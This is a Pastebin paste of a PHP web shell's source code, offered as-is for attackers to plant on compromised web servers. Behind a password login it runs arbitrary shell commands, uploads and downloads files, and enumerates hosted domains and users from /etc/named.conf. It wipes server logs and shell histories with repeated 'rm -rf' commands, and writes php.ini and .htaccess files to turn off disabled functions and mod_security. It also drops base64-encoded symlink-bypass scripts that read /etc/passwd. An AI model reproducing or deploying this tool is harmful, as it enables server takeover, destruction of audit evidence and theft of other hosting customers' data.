Guest User

Untitled

a guest
Mar 21st, 2018
79
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 190.52 KB | None | 0 0
  1. <?php
  2. session_start();
  3. error_reporting(0);
  4. set_time_limit(0);
  5. @set_magic_quotes_runtime(0);
  6. @clearstatcache();
  7. @ini_set('error_log',NULL);
  8. @ini_set('log_errors',0);
  9. @ini_set('max_execution_time',0);
  10. @ini_set('output_buffering',0);
  11. @ini_set('display_errors', 0);
  12.  
  13. $auth_pass = "07962cea72340057c259db94ef9611c5"; // default: arivin
  14. $color = "#00ff00";
  15. $default_action = 'FilesMan';
  16. $default_use_ajax = true;
  17. $default_charset = 'UTF-8';
  18. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  19. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  20. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  21. header('HTTP/1.0 404 Not Found');
  22. exit;
  23. }
  24. }
  25.  
  26. function login_shell() {
  27. ?>
  28. <html>
  29. <head>
  30. <title>Welcome to koneksi eror</title>
  31. <style type="text/css">
  32. html {
  33. margin: 20px auto;
  34. background: #000000;
  35. color: black;
  36. text-align: center;
  37. }
  38. header {
  39. color: red;
  40. margin: 10px auto;
  41. }
  42. input[type=password] {
  43. width: 250px;
  44. height: 25px;
  45. color: red;
  46. background: #000000;
  47. border: 1px dotted green;
  48. padding: 5px;
  49. margin-left: 20px;
  50. text-align: center;
  51. }
  52. </style>
  53. </head>
  54. <center>
  55. <header>
  56. <pre>
  57.  
  58. ~
  59.  
  60. ,-. ,-. .--.--. ,---, ,--, ,--,
  61. ,--/ /| ,--/ /| ,--, / / '. ,--.' | ,--.'| ,--.'|
  62. ,--. :/ | ,---. ,---, ,--. :/ | ,--.'| __ ,-. ,---. __ ,-. | : /`. / | | : | | : | | :
  63. : : ' / ' ,'\ ,-+-. / | : : ' / .--.--. | |, ,' ,'/ /| ' ,'\ ,' ,'/ /| ; | |--` : : : : : ' : : '
  64. | ' / / / | ,--.'|' | ,---. | ' / / / ' `--'_ ,---. ' | |' | / / |' | |' | | : ;_ : | |,--. ,---. | ' | | ' |
  65. ' | : . ; ,. :| | ,"' | / \ ' | : | : /`./ ,' ,'| / \ | | ,'. ; ,. :| | ,' \ \ `. | : ' | / \ ' | | ' | |
  66. | | \ ' | |: :| | / | | / / || | \| : ;_ ' | | / / |' : / ' | |: :' : / `----. \| | /' : / / || | : | | :
  67. ' : |. \' | .; :| | | | |. ' / |' : |. \\ \ `. | | : . ' / || | ' ' | .; :| | ' __ \ \ |' : | | |. ' / |' : |__' : |__
  68. | | ' \ \ : || | | |/ ' ; /|| | ' \ \`----. \' : |__ ' ; /|; : | | : |; : | / /`--' /| | ' | :' ; /|| | '.'| | '.'|
  69. ' : |--' \ \ / | | |--' ' | / |' : |--'/ /`--' /| | '.'| ' | / || , ; \ \ / | , ; '--'. / | : :_:,'' | / |; : ; : ;
  70. ; |,' `----' | |/ | : |; |,' '--'. / ; : ; | : | ---' `----' ---' `--'---' | | ,' | : || , /| , /
  71. '--' '---' \ \ / '--' `--'---' | , / \ \ / `--'' \ \ / ---`-' ---`-'
  72. `----' ---`-' `----' `----'
  73.  
  74.  
  75. </pre>
  76. </header>
  77. <form method="post">
  78. <input type="password" name="pass">
  79. </form>
  80. <?php
  81. exit;
  82. }
  83. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  84. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  85. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  86. else
  87. login_shell();
  88. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  89. @ob_clean();
  90. $file = $_GET['file'];
  91. header('Content-Description: File Transfer');
  92. header('Content-Type: application/octet-stream');
  93. header('Content-Disposition: attachment; filename="'.basename($file).'"');
  94. header('Expires: 0');
  95. header('Cache-Control: must-revalidate');
  96. header('Pragma: public');
  97. header('Content-Length: ' . filesize($file));
  98. readfile($file);
  99. exit;
  100. }
  101. ?>
  102. <!DOCTYPE HTML>
  103. <HTML>
  104. <HEAD>
  105. <link href="" rel="stylesheet" type="text/css">
  106. <title>koneksi eror</title>
  107. <meta charset="utf-8">
  108. <meta name="viewport" content="width=device-width, initial-scale=1">
  109. <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
  110. <script src="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
  111. <style>
  112. body {
  113. background: url(http://i184.photobucket.com/albums/x201/hubadub93/skull-1.gif) no-repeat center center fixed;
  114. -webkit-background-size: cover;
  115. -moz-background-size: cover;
  116. -o-background-size: cover;
  117. background-size: cover;
  118. color: white;
  119. }
  120. .twitter a{
  121. text-decoration: none;
  122. font-family: Arial, sans-serif ;
  123. font-size: 50px;
  124. text-shadow: grey 0px 0px 10px;
  125. }
  126.  
  127.  
  128. }
  129. <body background="http://i184.photobucket.com/albums/x201/hubadub93/skull-1.gif">
  130. @font-face {
  131. font-family: 'ubuntu_monoregular';
  132. src: url(data:application/x-font-woff;charset=utf-8;base64,) format('woff');
  133. font-weight: normal;
  134. font-style: normal;
  135.  
  136. }
  137.  
  138.  
  139.  
  140. option{
  141. background:#000;color:white;border:0;}
  142. }
  143. .table_home, .td_home {
  144. border: 1px solid #191919;
  145. }
  146. .table_home td:hover {
  147. background: #191919;
  148. }
  149. .th_home {
  150. font-family:ubuntu_monoregular;
  151. font-size: 12px;
  152. background:#191919;
  153. color:white;
  154. border-color: #191919;
  155. text-decoration:none;
  156. letter-spacing:2px;
  157. }
  158. th {
  159. padding: 10px;
  160. }
  161. a {
  162. color: #ffffff;
  163. text-decoration: none;
  164. }
  165. a:hover {
  166. color: white;
  167. text-decoration: underline;
  168. font-family:ubuntu_monoregular;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;border:1;
  169.  
  170. }
  171. b {
  172. color: white;
  173. }
  174. input[type=text], input[type=password],input[type=submit] {
  175. background: transparent;
  176. color:white;
  177. margin:0 10px;
  178. font-family:Homenaje;
  179. font-size:13px;
  180. border:2px solid #2d2b2b;
  181. }
  182. input[type=submit] {
  183. background: transparent;
  184. color:white;
  185. margin:0 10px;
  186. font-family:Homenaje;
  187. font-size:13px;
  188. border:2px solid #2d2b2b;
  189.  
  190. }
  191. option:hover {
  192. background:#000;color:white;border:0;}
  193.  
  194. }.a_exp{border:1px solid #fff;border-collapse: collapse;
  195. }
  196. .mybox{-moz-border-radius: 10px; border-radius: 10px;border:1px solid #ff0000; padding:4px 2px;width:70%;line-height:24px;background:none;box-shadow: 0px 4px 2px white;-webkit-box-shadow: 0px 4px 2px #ff0000;-moz-box-shadow: 0px 4px 2px #ff0000;}
  197. .cgx2 {text-align: center;letter-spacing:1px;font-family: "orbitron";color: #ff0000;font-size:25px;text-shadow: 5px 5px 5px black;}
  198. .infoweb {
  199. border-right: 1px solid #00FFFF;
  200. }
  201. </style>
  202. </head>
  203.  
  204. <?php
  205. function w($dir,$perm) {
  206. if(!is_writable($dir)) {
  207. return "<font color=red>".$perm."</font>";
  208. } else {
  209. return "<font color=white>".$perm."</font>";
  210. }
  211. }
  212. function exe($cmd) {
  213. if(function_exists('system')) {
  214. @ob_start();
  215. @system($cmd);
  216. $buff = @ob_get_contents();
  217. @ob_end_clean();
  218. return $buff;
  219. } elseif(function_exists('exec')) {
  220. @exec($cmd,$results);
  221. $buff = "";
  222. foreach($results as $result) {
  223. $buff .= $result;
  224. } return $buff;
  225. } elseif(function_exists('passthru')) {
  226. @ob_start();
  227. @passthru($cmd);
  228. $buff = @ob_get_contents();
  229. @ob_end_clean();
  230. return $buff;
  231. } elseif(function_exists('shell_exec')) {
  232. $buff = @shell_exec($cmd);
  233. return $buff;
  234. }
  235. }
  236. function sulap($text) {
  237. if(!get_magic_quotes_gpc()) {
  238. return $text;
  239. }
  240. return stripslashes($text);
  241. }
  242. function GrabUrl($url,$type){
  243.  
  244. $urlArray = array();
  245.  
  246. $ch = curl_init();
  247. curl_setopt($ch, CURLOPT_URL, $url);
  248. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  249. $result = curl_exec($ch);
  250.  
  251. $regex='|<a.*?href="(.*?)"|';
  252. preg_match_all($regex,$result,$parts);
  253. $links=$parts[1];
  254. foreach($links as $link){
  255. array_push($urlArray, $link);
  256. }
  257. curl_close($ch);
  258.  
  259. foreach($urlArray as $value){
  260. $lol="$url$value";
  261. if(preg_match("#$type#is", $lol)) {
  262. echo "$lol\r\n";
  263. }
  264. }
  265. }
  266. function showdisablefunctions() {
  267. if ($disablefunc=@ini_get("disable_functions")){ return "<span style='color:'><font color=#DD4736><b>".$disablefunc."</b></font></span>"; }
  268. else { return "<span style='color:#00FF1E'><b>NONE</b></span>"; }
  269. }
  270. function ambilKata($param, $kata1, $kata2){
  271. if(strpos($param, $kata1) === FALSE) return FALSE;
  272. if(strpos($param, $kata2) === FALSE) return FALSE;
  273. $start = strpos($param, $kata1) + strlen($kata1);
  274. $end = strpos($param, $kata2, $start);
  275. $return = substr($param, $start, $end - $start);
  276. return $return;
  277. }
  278. function perms($file){
  279. $perms = fileperms($file);
  280. if (($perms & 0xC000) == 0xC000) {
  281. // Socket
  282. $info = 's';
  283. } elseif (($perms & 0xA000) == 0xA000) {
  284. // Symbolic Link
  285. $info = 'l';
  286. } elseif (($perms & 0x8000) == 0x8000) {
  287. // Regular
  288. $info = '-';
  289. } elseif (($perms & 0x6000) == 0x6000) {
  290. // Block special
  291. $info = 'b';
  292. } elseif (($perms & 0x4000) == 0x4000) {
  293. // Directory
  294. $info = 'd';
  295. } elseif (($perms & 0x2000) == 0x2000) {
  296. // Character special
  297. $info = 'c';
  298. } elseif (($perms & 0x1000) == 0x1000) {
  299. // FIFO pipe
  300. $info = 'p';
  301. } else {
  302. // Unknown
  303. $info = 'u';
  304. }
  305.  
  306. // Owner
  307. $info .= (($perms & 0x0100) ? 'r' : '-');
  308. $info .= (($perms & 0x0080) ? 'w' : '-');
  309. $info .= (($perms & 0x0040) ?
  310. (($perms & 0x0800) ? 's' : 'x' ) :
  311. (($perms & 0x0800) ? 'S' : '-'));
  312.  
  313. // Group
  314. $info .= (($perms & 0x0020) ? 'r' : '-');
  315. $info .= (($perms & 0x0010) ? 'w' : '-');
  316. $info .= (($perms & 0x0008) ?
  317. (($perms & 0x0400) ? 's' : 'x' ) :
  318. (($perms & 0x0400) ? 'S' : '-'));
  319.  
  320. // World
  321. $info .= (($perms & 0x0004) ? 'r' : '-');
  322. $info .= (($perms & 0x0002) ? 'w' : '-');
  323. $info .= (($perms & 0x0001) ?
  324. (($perms & 0x0200) ? 't' : 'x' ) :
  325. (($perms & 0x0200) ? 'T' : '-'));
  326.  
  327. return $info;
  328. }
  329. $_c7e = 'WGFpIFN5bmRpY2F0ZQ==';
  330. $sys = php_uname();
  331. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  332. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? '<font>ON</font>' : '<font>OFF</font>';
  333. $getds = @ini_get("disable_functions");
  334. $ds = showdisablefunctions().' <font color=white>on</font> <font color=teal>'.php_sapi_name().'</font>';
  335. if(isset($_GET['path'])){
  336. $path = $_GET['path'];
  337. }else{
  338. $path = getcwd();
  339. }
  340. $path = str_replace('\\','/',$path);
  341. $paths = explode('/',$path);
  342. $home_r = $_SERVER['DOCUMENT_ROOT'];
  343. if(get_magic_quotes_gpc()){
  344. foreach($_POST as $key=>$value){
  345. $_POST[$key] = stripslashes($value);
  346. }
  347. }
  348. if($_POST['upload']) {
  349. if($_POST['tipe_upload'] == 'biasa') {
  350. if(@copy($_FILES['ix_file']['tmp_name'], "$path/".$_FILES['ix_file']['name']."")) {
  351. $act = "<font color=green>Uploaded!</font> at <i><b>$path/".$_FILES['ix_file']['name']."</b></i>";
  352. } else {
  353. $act = "<font color=red>Failed to upload file</font>";
  354. }
  355. } else {
  356. $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  357. $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  358. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  359. if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  360. $act = "<font color=green>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  361. } else {
  362. $act = "<font color=red>Failed to upload file</font>";
  363. }
  364. } else {
  365. $act = "<font color=red>Failed to upload file</font>";
  366. }
  367. }
  368.  
  369. }
  370. echo '</br>
  371. System : '.$sys.'<br>
  372. IP : '.$ip.'<br>
  373. Safe Mode : '.$sm.'<br>
  374. Disabled Functions : '.$ds.'<br>
  375. </center>
  376. </td></tr>
  377. </table>';
  378. foreach($paths as $id=>$pat){
  379. if($pat == '' && $id == 0){
  380. $a = true;
  381. echo '<a href="?path=/">/</a>';
  382. continue;
  383. }
  384. if($pat == '') continue;
  385. echo '<a href="?path=';
  386. for($i=0;$i<=$id;$i++){
  387. echo "$paths[$i]";
  388. if($i != $id) echo "/";
  389. }
  390. echo '">'.$pat.'</a>/';
  391. }
  392. echo "<center>
  393. <form method='post' enctype='multipart/form-data'>
  394. <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($path,"Writeable")." ]
  395. <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
  396. </br>
  397. <input type='file' name='ix_file'>
  398. <input type='submit' value='upload' name='upload'>
  399. </form>";
  400. echo $act;
  401.  
  402. echo"
  403. <div id='menu'>
  404. <center>
  405. <ul>
  406. <a href='?'><b>Home</b></a>
  407. <a href='?path=$path&jancok=cmd'>Command</a>
  408. <a href='?path=$path&jancok=mass'>Mass</a>
  409. <a href='?path=$path&jancok=adminer'>Adminer</a>
  410. <a href='?path=$path&jancok=jumping'>Jumping</a>
  411. <a href='?path=$path&jancok=cpanel'>Grab Cpanel</a></div></br>
  412. <a href='?path=$path&jancok=cgi'>Cgi Telnet</a>
  413. <a href='?path=$path&config=grabber'>Config V1</a>
  414. <a href='?path=$path&mass=changer'>Mass User Changer</a>
  415. <a href='?path=$path&backconnect=tool'>Back Connect Tools</a>
  416. <a href='?path=$path&symlink=tool'>Symlink Tools</a>
  417. <a href='?path=$path&bypass=tool'>Bypass Tools</a>
  418. <a href='?path=$path&jancok=logout'><b>Log-Out</b></a></div></ul></div></center>";
  419. echo '</td></tr>';
  420. echo '</table>';
  421.  
  422. if($_GET['jancok'] == 'logout') {
  423. echo '<form action="?patch='.$path.'&do=logout" method="post">';
  424. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  425. echo 'Good Bye!!';
  426. } elseif($_GET['tatsumi'] == 'domains'){echo "<center><div class='mybox'><p align='center' class='cgx2'>Domains and Users</p>";$d0mains = @file("/etc/named.conf");if(!$d0mains){die("<center>Error : can't read [ /etc/named.conf ]</center>");}echo '<table id="output"><tr bgcolor=#cecece><td>Domains</td><td>users</td></tr>';foreach($d0mains as $d0main){if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);flush();if(strlen(trim($domains[1][0])) > 2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td></tr>";flush();}}}echo'</div></center>';
  427. }elseif($_GET['tatsumi'] == 'info') {
  428. } elseif($_GET['delete'] == 'logs') {
  429. echo '<br><center><b><span>Delete Logs ( For Safe )</span></b><center><br>';
  430. echo "<table style='margin: 0 auto;'><tr valign='top'><td align='left'>";
  431. exec("rm -rf /tmp/logs");
  432. exec("rm -rf /root/.ksh_history");
  433. exec("rm -rf /root/.bash_history");
  434. exec("rm -rf /root/.bash_logout");
  435. exec("rm -rf /usr/local/apache/logs");
  436. exec("rm -rf /usr/local/apache/log");
  437. exec("rm -rf /var/apache/logs");
  438. exec("rm -rf /var/apache/log");
  439. exec("rm -rf /var/run/utmp");
  440. exec("rm -rf /var/logs");
  441. exec("rm -rf /var/log");
  442. exec("rm -rf /var/adm");
  443. exec("rm -rf /etc/wtmp");
  444. exec("rm -rf /etc/utmp");
  445. exec("rm -rf $HISTFILE");
  446. exec("rm -rf /var/log/lastlog");
  447. exec("rm -rf /var/log/wtmp");
  448.  
  449. shell_exec("rm -rf /tmp/logs");
  450. shell_exec("rm -rf /root/.ksh_history");
  451. shell_exec("rm -rf /root/.bash_history");
  452. shell_exec("rm -rf /root/.bash_logout");
  453. shell_exec("rm -rf /usr/local/apache/logs");
  454. shell_exec("rm -rf /usr/local/apache/log");
  455. shell_exec("rm -rf /var/apache/logs");
  456. shell_exec("rm -rf /var/apache/log");
  457. shell_exec("rm -rf /var/run/utmp");
  458. shell_exec("rm -rf /var/logs");
  459. shell_exec("rm -rf /var/log");
  460. shell_exec("rm -rf /var/adm");
  461. shell_exec("rm -rf /etc/wtmp");
  462. shell_exec("rm -rf /etc/utmp");
  463. shell_exec("rm -rf $HISTFILE");
  464. shell_exec("rm -rf /var/log/lastlog");
  465. shell_exec("rm -rf /var/log/wtmp");
  466.  
  467. passthru("rm -rf /tmp/logs");
  468. passthru("rm -rf /root/.ksh_history");
  469. passthru("rm -rf /root/.bash_history");
  470. passthru("rm -rf /root/.bash_logout");
  471. passthru("rm -rf /usr/local/apache/logs");
  472. passthru("rm -rf /usr/local/apache/log");
  473. passthru("rm -rf /var/apache/logs");
  474. passthru("rm -rf /var/apache/log");
  475. passthru("rm -rf /var/run/utmp");
  476. passthru("rm -rf /var/logs");
  477. passthru("rm -rf /var/log");
  478. passthru("rm -rf /var/adm");
  479. passthru("rm -rf /etc/wtmp");
  480. passthru("rm -rf /etc/utmp");
  481. passthru("rm -rf $HISTFILE");
  482. passthru("rm -rf /var/log/lastlog");
  483. passthru("rm -rf /var/log/wtmp");
  484.  
  485.  
  486. system("rm -rf /tmp/logs");
  487. sleep(2);
  488. echo'<br>Deleting .../tmp/logs ';
  489. sleep(2);
  490.  
  491. system("rm -rf /root/.bash_history");
  492. sleep(2);
  493. echo'<p>Deleting .../root/.bash_history </p>';
  494.  
  495. system("rm -rf /root/.ksh_history");
  496. sleep(2);
  497. echo'<p>Deleting .../root/.ksh_history </p>';
  498.  
  499. system("rm -rf /root/.bash_logout");
  500. sleep(2);
  501. echo'<p>Deleting .../root/.bash_logout </p>';
  502.  
  503. system("rm -rf /usr/local/apache/logs");
  504. sleep(2);
  505. echo'<p>Deleting .../usr/local/apache/logs </p>';
  506.  
  507. system("rm -rf /usr/local/apache/log");
  508. sleep(2);
  509. echo'<p>Deleting .../usr/local/apache/log </p>';
  510.  
  511. system("rm -rf /var/apache/logs");
  512. sleep(2);
  513. echo'<p>Deleting .../var/apache/logs </p>';
  514.  
  515. system("rm -rf /var/apache/log");
  516. sleep(2);
  517. echo'<p>Deleting .../var/apache/log </p>';
  518.  
  519. system("rm -rf /var/run/utmp");
  520. sleep(2);
  521. echo'<p>Deleting .../var/run/utmp </p>';
  522.  
  523. system("rm -rf /var/logs");
  524. sleep(2);
  525. echo'<p>Deleting .../var/logs </p>';
  526.  
  527. system("rm -rf /var/log");
  528. sleep(2);
  529. echo'<p>Deleting .../var/log </p>';
  530.  
  531. system("rm -rf /var/adm");
  532. sleep(2);
  533. echo'<p>Deleting .../var/adm </p>';
  534.  
  535. system("rm -rf /etc/wtmp");
  536. sleep(2);
  537. echo'<p>Deleting .../etc/wtmp </p>';
  538.  
  539. system("rm -rf /etc/utmp");
  540. sleep(2);
  541. echo'<p>Deleting .../etc/utmp </p>';
  542.  
  543. system("rm -rf $HISTFILE");
  544. sleep(2);
  545. echo'<p>Deleting ...$HISTFILE </p>';
  546.  
  547. system("rm -rf /var/log/lastlog");
  548. sleep(2);
  549. echo'<p>Deleting .../var/log/lastlog </p>';
  550.  
  551. system("rm -rf /var/log/wtmp");
  552. sleep(2);
  553. echo'<p>Deleting .../var/log/wtmp </p>';
  554.  
  555. sleep(4);
  556.  
  557. echo '<br><br><p>Your Traces Has Been Successfully Deleting ...From the Server';
  558. echo"</td></tr></table>";
  559. } elseif($_GET['bypass'] == 'vhosts') {
  560. echo "<div id='menu'><center></br><a href='?path=$path&bypass=disablefunc'>Disable Functions</a></br><a href='?path=$path&bypass=passwd'>Bypass /etc/passwd</a></br><a href='?path=$path&bypass=vhostss'>Bypass Vhosts</a></br></div>";
  561. echo "<form method='POST' action=''>";
  562. echo "<center><br><font size='6'>Bypass Symlink vHost</font><br><br>";
  563. echo "<center><input type='submit' value='Bypass it' name='Colii'></center>";
  564. if (isset($_POST['Colii'])){
  565. mkdir('symvhosts', 0755);
  566. chdir('symvhosts');
  567. system('ln -s / tatsumi.txt');
  568. $fvckem ='T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBzc3Nzc3MuaHRtDQpBZGRUeXBlIHR4dCAucGhwDQpBZGRIYW5kbGVyIHR4dCAucGhw';
  569. $file = fopen(".htaccess","w+"); $write = fwrite ($file ,base64_decode($fvckem)); $Bok3p = symlink("/","tatsumi.txt");
  570. $rt="<br><a href=symvhosts/tatsumi.txt TARGET='_blank'><font color=#ff0000 size=2 face='Courier New'><b>
  571. Bypassed Successfully</b></font></a>";
  572. echo "<br><br><b>Done.. !</b><br><br>Check link given below for / folder symlink <br>$rt<br>Note: Apabila Forbidden pas buka /var/www/vhosts/Domain.com/ harap tambahkan httpdocs ex:/var/www/vhosts/Domain.com/httpdocs/</center>";} echo "</form>";
  573. } elseif($_GET['jancok'] == 'cgi') {
  574. $cgi_dir = mkdir('tatsumi_cgi', 0755);
  575. chdir('tatsumi_cgi');
  576. $file_cgi = "cgi.tatsumi";
  577. $memeg = ".htaccess";
  578. $isi_htcgi = "OPTIONS Indexes Includes ExecCGI FollowSymLinks \n AddType application/x-httpd-cgi .tatsumi \n AddHandler cgi-script .tatsumi \n AddHandler cgi-script .tatsumi";
  579. $htcgi = fopen(".htaccess", "w");
  580. $cgi_script = "";
  581. $cgi = fopen($file_cgi, "w");
  582. fwrite($cgi, base64_decode($cgi_script));
  583. fwrite($htcgi, $isi_htcgi);
  584. chmod($file_cgi, 0755);
  585. chmod($memeg, 0755);
  586. echo "<br><center>Done ... <a href='tatsumi_cgi/cgi.tatsumi' target='_blank'>Klik Here</a>";
  587. }elseif($_GET['symlink'] == 'python') {
  588. $sym_dir = mkdir('tatsumi_sympy', 0755);
  589. chdir('tatsumi_sympy');
  590. $file_sym = "sym.py";
  591. $sym_script = "Iy8qUHl0aG9uDQoNCmltcG9ydCB0aW1lDQppbXBvcnQgb3MNCmltcG9ydCBzeXMNCmltcG9ydCByZQ0KDQpvcy5zeXN0ZW0oImNvbG9yIEMiKQ0KDQpodGEgPSAiXG5GaWxlIDogLmh0YWNjZXNzIC8vIENyZWF0ZWQgU3VjY2Vzc2Z1bGx5IVxuIg0KZiA9ICJBbGwgUHJvY2Vzc2VzIERvbmUhXG5TeW1saW5rIEJ5cGFzc2VkIFN1Y2Nlc3NmdWxseSFcbiINCnByaW50ICJcbiINCnByaW50ICJ+Iio2MA0KcHJpbnQgIlN5bWxpbmsgQnlwYXNzIDIwMTQgYnkgTWluZGxlc3MgSW5qZWN0b3IgIg0KcHJpbnQgIiAgICAgICAgICAgICAgU3BlY2lhbCBHcmVldHogdG8gOiBQYWsgQ3liZXIgU2t1bGx6Ig0KcHJpbnQgIn4iKjYwDQoNCm9zLm1ha2VkaXJzKCdicnVkdWxzeW1weScpDQpvcy5jaGRpcignYnJ1ZHVsc3ltcHknKQ0KDQpzdXNyPVtdDQpzaXRleD1bXQ0Kb3Muc3lzdGVtKCJsbiAtcyAvIGJydWR1bC50eHQiKQ0KDQpoID0gIk9wdGlvbnMgSW5kZXhlcyBGb2xsb3dTeW1MaW5rc1xuRGlyZWN0b3J5SW5kZXggYnJ1ZHVsLnBodG1sXG5BZGRUeXBlIHR4dCAucGhwXG5BZGRIYW5kbGVyIHR4dCAucGhwIg0KbSA9IG9wZW4oIi5odGFjY2VzcyIsIncrIikNCm0ud3JpdGUoaCkNCm0uY2xvc2UoKQ0KcHJpbnQgaHRhDQoNCnNmID0gIjxodG1sPjx0aXRsZT5TeW1saW5rIFB5dGhvbjwvdGl0bGU+PGNlbnRlcj48Zm9udCBjb2xvcj13aGl0ZSBzaXplPTU+U3ltbGluayBCeXBhc3MgMjAxNzxicj48Zm9udCBzaXplPTQ+TWFkZSBCeSBNaW5kbGVzcyBJbmplY3RvciA8YnI+UmVjb2RlZCBCeSBDb243ZXh0PC9mb250PjwvZm9udD48YnI+PGZvbnQgY29sb3I9d2hpdGUgc2l6ZT0zPjx0YWJsZT4iDQoNCm8gPSBvcGVuKCcvZXRjL3Bhc3N3ZCcsJ3InKQ0Kbz1vLnJlYWQoKQ0KbyA9IHJlLmZpbmRhbGwoJy9ob21lL1x3KycsbykNCg0KZm9yIHh1c3IgaW4gbzoNCgl4dXNyPXh1c3IucmVwbGFjZSgnL2hvbWUvJywnJykNCglzdXNyLmFwcGVuZCh4dXNyKQ0KcHJpbnQgIi0iKjMwDQp4c2l0ZSA9IG9zLmxpc3RkaXIoIi92YXIvbmFtZWQiKQ0KDQpmb3IgeHhzaXRlIGluIHhzaXRlOg0KCXh4c2l0ZT14eHNpdGUucmVwbGFjZSgiLmRiIiwiIikNCglzaXRleC5hcHBlbmQoeHhzaXRlKQ0KcHJpbnQgZg0KcGF0aD1vcy5nZXRjd2QoKQ0KaWYgIi9wdWJsaWNfaHRtbC8iIGluIHBhdGg6DQoJcGF0aD0iL3B1YmxpY19odG1sLyINCmVsc2U6DQoJcGF0aCA9ICIvaHRtbC8iDQpjb3VudGVyPTENCmlwcz1vcGVuKCJicnVkdWwucGh0bWwiLCJ3IikNCmlwcy53cml0ZShzZikNCg0KZm9yIGZ1c3IgaW4gc3VzcjoNCglmb3IgZnNpdGUgaW4gc2l0ZXg6DQoJCWZ1PWZ1c3JbMDo1XQ0KCQlzPWZzaXRlWzA6NV0NCgkJaWYgZnU9PXM6DQoJCQlpcHMud3JpdGUoIjxib2R5IGJnY29sb3I9YmxhY2s+PHRyPjx0ZCBzdHlsZT1mb250LWZhbWlseTpjYWxpYnJpO2ZvbnQtd2VpZ2h0OmJvbGQ7Y29sb3I6d2hpdGU7PiVzPC90ZD48dGQgc3R5bGU9Zm9udC1mYW1pbHk6Y2FsaWJyaTtmb250LXdlaWdodDpib2xkO2NvbG9yOnJlZDs+JXM8L3RkPjx0ZCBzdHlsZT1mb250LWZhbWlseTpjYWxpYnJpO2ZvbnQtd2VpZ2h0OmJvbGQ7PjxhIGhyZWY9YnJ1ZHVsLnR4dC9ob21lLyVzJXMgdGFyZ2V0PV9ibGFuayA+JXM8L2E+PC90ZD4iJShjb3VudGVyLGZ1c3IsZnVzcixwYXRoLGZzaXRlKSkNCgkJCWNvdW50ZXI9Y291bnRlcisx";
  592. $sym = fopen($file_sym, "w");
  593. fwrite($sym, base64_decode($sym_script));
  594. chmod($file_sym, 0755);
  595. $jancok = exe("python sym.py");
  596.  
  597. echo "<div id='menu'><center></br><a href='?path=$path&symlink=server'>Symlink Server </a></br><a href='?path=$path&symlink=404'>Symlink 404</a></br><a href='?path=$path&symlink=python'>Bypass Symlink Python</a></div>";
  598. echo "<br><center>Done ... <a href='tatsumi_sympy/brudulsympy/' target='_blank'>Klik Here</a>";
  599. } elseif($_GET['bypass'] == 'disablefunc'){
  600. echo "<div id='menu'><center></br><a href='?path=$path&bypass=disablefunc'>Disable Functions</a></br><a href='?path=$path&bypass=passwd'>Bypass /etc/passwd</a></br><a href='?path=$path&bypass=vhosts'>Bypass Vhosts</a></div>";
  601. echo "<br><br><center>";
  602. echo "<form method=post><input type=submit name=ini value='php.ini' />&nbsp;<input type=submit name=htce value='.htaccess' />&nbsp;<input type=submit name=litini value='Litespeed' /></form>";
  603. if(isset($_POST['ini']))
  604. {
  605. $file = fopen("php.ini","w");
  606. echo fwrite($file,"disable_functions=none
  607. safe_mode = Off
  608. ");
  609. fclose($file);
  610. echo "<a href='php.ini'>click here!</a>";
  611. } if(isset($_POST['htce']))
  612. {
  613. $file = fopen(".htaccess","w");
  614. echo fwrite($file,"<IfModule mod_security.c>
  615. SecFilterEngine Off
  616. SecFilterScanPOST Off
  617. </IfModule>
  618. ");
  619. fclose($file);
  620. echo "htaccess successfully created!";
  621. } if(isset($_POST['litini'])){
  622. $iniph = '<? n echo ini_get("safe_mode"); n echo ini_get("open_basedir"); n include($_GET["file"]); n ini_restore("safe_mode"); n ini_restore("open_basedir"); n echo ini_get("safe_mode"); n echo ini_get("open_basedir"); n include($_GET["ss"]; n ?>';
  623. $byph = "safe_mode = Off n disable_functions= ";
  624. $comp="PEZpbGVzICoucGhwPg0KRm9yY2VUeXBlIGFwcGxpY2F0aW9uL3gtaHR0cGQtcGhwNA0KPC9GaWxlcz4=";
  625. file_put_contents("php.ini",base64_decode($byph));
  626. file_put_contents("ini.php",base64_decode($iniph));
  627. file_put_contents(".htaccess",base64_decode($comp));
  628. echo "<script>alert('Disable Functions in Litespeed Created'); hideAll();</script>";
  629. echo"</center>";
  630. }
  631. }elseif($_GET['bypass'] == 'tool'){
  632. echo "<div id='menu'><center>";
